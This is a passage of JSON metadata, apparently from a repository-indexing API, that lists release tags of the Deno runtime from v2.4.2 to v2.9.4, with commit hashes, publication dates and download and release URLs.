ea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.